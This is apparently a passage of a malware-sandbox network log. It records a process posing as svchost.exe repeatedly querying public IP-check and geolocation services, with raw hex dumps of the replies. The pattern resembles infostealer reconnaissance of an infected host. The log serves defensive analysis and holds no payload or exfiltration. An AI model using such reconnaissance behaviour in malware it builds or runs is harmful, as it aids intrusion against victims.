                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Oct 9, 2024 12:13:48.719733953 CEST320INHTTP/1.1 200 OK
                                                                                      Date: Wed, 09 Oct 2024 10:13:48 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 103
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      X-Request-ID: 056f36b4fa161b87f4f00b50f73bc357
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      11192.168.2.849733193.122.6.168807524C:\Windows\SysWOW64\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 9, 2024 12:13:49.559729099 CEST127OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Oct 9, 2024 12:13:50.186192036 CEST320INHTTP/1.1 200 OK
                                                                                      Date: Wed, 09 Oct 2024 10:13:50 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 103
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      X-Request-ID: 06e6c86e42a93c5475d3592f297849ae
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      12192.168.2.849735193.122.6.168807524C:\Windows\SysWOW64\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 9, 2024 12:13:50.838510990 CEST127OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Oct 9, 2024 12:13:51.493196964 CEST320INHTTP/1.1 200 OK
                                                                                      Date: Wed, 09 Oct 2024 10:13:51 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 103
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      X-Request-ID: 526f73843eeb813d15bec0fd213b1c90
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      13192.168.2.849737193.122.6.168807524C:\Windows\SysWOW64\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 9, 2024 12:13:52.133239985 CEST151OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Connection: Keep-Alive
                                                                                      Oct 9, 2024 12:13:52.811613083 CEST320INHTTP/1.1 200 OK
                                                                                      Date: Wed, 09 Oct 2024 10:13:52 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 103
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      X-Request-ID: 863a8b372e9b147f64ee940174262e06
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      14192.168.2.849739193.122.6.168807524C:\Windows\SysWOW64\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 9, 2024 12:13:53.504349947 CEST151OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Connection: Keep-Alive
                                                                                      Oct 9, 2024 12:13:54.140089035 CEST320INHTTP/1.1 200 OK
                                                                                      Date: Wed, 09 Oct 2024 10:13:54 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 103
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      X-Request-ID: b20bf98dfb557cb7617ea2b434cba0b2
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      15192.168.2.849741193.122.6.168807524C:\Windows\SysWOW64\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 9, 2024 12:13:55.034521103 CEST151OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                      Host: checkip.dyndns.org
                                                                                      Connection: Keep-Alive
                                                                                      Oct 9, 2024 12:13:55.685668945 CEST320INHTTP/1.1 200 OK
                                                                                      Date: Wed, 09 Oct 2024 10:13:55 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 103
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      X-Request-ID: dcfb6770b253fc8f7a14fb23ea59f800
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.849708188.114.97.34438104C:\Windows\SysWOW64\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-10-09 10:13:23 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                      Host: reallyfreegeoip.org
                                                                                      Connection: Keep-Alive
                                                                                      2024-10-09 10:13:23 UTC671INHTTP/1.1 200 OK
                                                                                      Date: Wed, 09 Oct 2024 10:13:23 GMT
                                                                                      Content-Type: application/xml
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      access-control-allow-origin: *
                                                                                      vary: Accept-Encoding
                                                                                      Cache-Control: max-age=86400
                                                                                      CF-Cache-Status: HIT
                                                                                      Age: 19
                                                                                      Last-Modified: Wed, 09 Oct 2024 10:13:04 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VIdQw6MQL1b%2F94lLauInGfPJAsDyiGKH7BSGDgfsxOtjjycASVvD8dv9ao0oBNY4HWuL87xrdozjckLONltVPTKJ5VX54rvzOIW06RPCCF2GH4K%2F6J3JBnCD451OD4JRg1q6NY4x"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8cfd99078d6f8c05-EWR
                                                                                      2024-10-09 10:13:23 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                      2024-10-09 10:13:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.849709188.114.97.34438104C:\Windows\SysWOW64\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-10-09 10:13:24 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                      Host: reallyfreegeoip.org
                                                                                      2024-10-09 10:13:24 UTC671INHTTP/1.1 200 OK
                                                                                      Date: Wed, 09 Oct 2024 10:13:24 GMT
                                                                                      Content-Type: application/xml
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      access-control-allow-origin: *
                                                                                      vary: Accept-Encoding
                                                                                      Cache-Control: max-age=86400
                                                                                      CF-Cache-Status: HIT
                                                                                      Age: 20
                                                                                      Last-Modified: Wed, 09 Oct 2024 10:13:04 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qiUCn1VscNUt4i11X25ukgUblRRSgZFcG1iyv01ccqw9P6IZm1fvcl7fBGy4GSg%2BTZQiIvyIUe6C4rsd4sEsC2hpXADW7WH5LXIbl0ofUf%2F0RRGy3oOiEE02vjF6MfIi3T74uhbv"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8cfd990c9e974349-EWR
                                                                                      2024-10-09 10:13:24 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                      2024-10-09 10:13:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      2192.168.2.849711188.114.97.34438104C:\Windows\SysWOW64\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-10-09 10:13:25 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                      Host: reallyfreegeoip.org
                                                                                      Connection: Keep-Alive
                                                                                      2024-10-09 10:13:25 UTC673INHTTP/1.1 200 OK
                                                                                      Date: Wed, 09 Oct 2024 10:13:25 GMT
                                                                                      Content-Type: application/xml
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      access-control-allow-origin: *
                                                                                      vary: Accept-Encoding
                                                                                      Cache-Control: max-age=86400
                                                                                      CF-Cache-Status: HIT
                                                                                      Age: 21
                                                                                      Last-Modified: Wed, 09 Oct 2024 10:13:04 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Nj2tDyUIaFGy4xWJcKo9Dy5FdTEr1cjKXqgl8R0PZgWtCJMXLe3ORe8XYxHBPl0SkG0ev80zENJNNvqfIwuIzlQ4gMb6IFfGRkH8%2Bj%2BugFTu0OR4ga2%2BLxGpEeJ5hvOsrccH9F7l"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8cfd9914584043ec-EWR
                                                                                      2024-10-09 10:13:25 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                      2024-10-09 10:13:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      3192.168.2.849713188.114.97.34438104C:\Windows\SysWOW64\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-10-09 10:13:27 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                      Host: reallyfreegeoip.org
                                                                                      Connection: Keep-Alive
                                                                                      2024-10-09 10:13:27 UTC679INHTTP/1.1 200 OK
                                                                                      Date: Wed, 09 Oct 2024 10:13:27 GMT
                                                                                      Content-Type: application/xml
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      access-control-allow-origin: *
                                                                                      vary: Accept-Encoding
                                                                                      Cache-Control: max-age=86400
                                                                                      CF-Cache-Status: HIT
                                                                                      Age: 23
                                                                                      Last-Modified: Wed, 09 Oct 2024 10:13:04 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FJyzAeRrTRS5p5mPiVKnjk%2FRQO9lR57ygagtwZ%2BaXIB%2BIe46DiXRvgqT5qlcjCtkFCwV8xTwPIt4qU1G9TkdGjMXS1v2N%2Fmse%2BSwwKpWkEWISQLLvVQ6yw3OtProdENNvjJGoYTY"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8cfd991c5a580f8d-EWR
                                                                                      2024-10-09 10:13:27 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                      2024-10-09 10:13:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      4192.168.2.849715188.114.97.34438104C:\Windows\SysWOW64\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-10-09 10:13:28 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                      Host: reallyfreegeoip.org
                                                                                      2024-10-09 10:13:28 UTC679INHTTP/1.1 200 OK
                                                                                      Date: Wed, 09 Oct 2024 10:13:28 GMT
                                                                                      Content-Type: application/xml
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      access-control-allow-origin: *
                                                                                      vary: Accept-Encoding
                                                                                      Cache-Control: max-age=86400
                                                                                      CF-Cache-Status: HIT
                                                                                      Age: 24
                                                                                      Last-Modified: Wed, 09 Oct 2024 10:13:04 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z2bQody5qy3ghchRBH1KgMA4CI%2BOfRLrkaZvTvO4n1%2F4KjQVBgYWMC5K3NmLw28bvLKstpIdHvgh%2FL3PoTpDMO%2BfD2jgLlG8nrS4VnUhnjs3uh54uof30A2ZkJ4Rlava%2BypE7%2FFN"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8cfd99241b177cfa-EWR
                                                                                      2024-10-09 10:13:28 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                      2024-10-09 10:13:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      5192.168.2.849717188.114.97.34438104C:\Windows\SysWOW64\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-10-09 10:13:29 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                      Host: reallyfreegeoip.org
                                                                                      2024-10-09 10:13:29 UTC699INHTTP/1.1 200 OK
                                                                                      Date: Wed, 09 Oct 2024 10:13:29 GMT
                                                                                      Content-Type: application/xml
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      access-control-allow-origin: *
                                                                                      vary: Accept-Encoding
                                                                                      Cache-Control: max-age=86400
                                                                                      CF-Cache-Status: HIT
                                                                                      Age: 25
                                                                                      Last-Modified: Wed, 09 Oct 2024 10:13:04 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hoUixTPlWsheoUNXmr2m71YCgq%2B0mCml2JIbRQAPPm7CUNOCOaMxKWfXZEuMimCmv4oqv1DeAuXPVtn6pDNLWVyVbVUJQWewQI9oJhcItUFvw4dPVkQ2V1lNh2HURWSmvIx2CVfV"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8cfd992c49f3430a-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      2024-10-09 10:13:29 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                      2024-10-09 10:13:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      6192.168.2.849719188.114.97.34438104C:\Windows\SysWOW64\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-10-09 10:13:30 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                      Host: reallyfreegeoip.org
                                                                                      2024-10-09 10:13:30 UTC671INHTTP/1.1 200 OK
                                                                                      Date: Wed, 09 Oct 2024 10:13:30 GMT
                                                                                      Content-Type: application/xml
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      access-control-allow-origin: *
                                                                                      vary: Accept-Encoding
                                                                                      Cache-Control: max-age=86400
                                                                                      CF-Cache-Status: HIT
                                                                                      Age: 26
                                                                                      Last-Modified: Wed, 09 Oct 2024 10:13:04 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MgcLcXVLImSfo7P50fHo3aNrSyJDzj0Cjzet%2FM7MFGsf3Ox0FJQ4KIy8eDhWpWhNc8E0K9rJIL6BqULB3GVtdTur6SDf2DgY9Ro5gwG5e3TMD%2BgbXrETwr4rS8kSmoQrgdykMVos"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8cfd9934184e4398-EWR
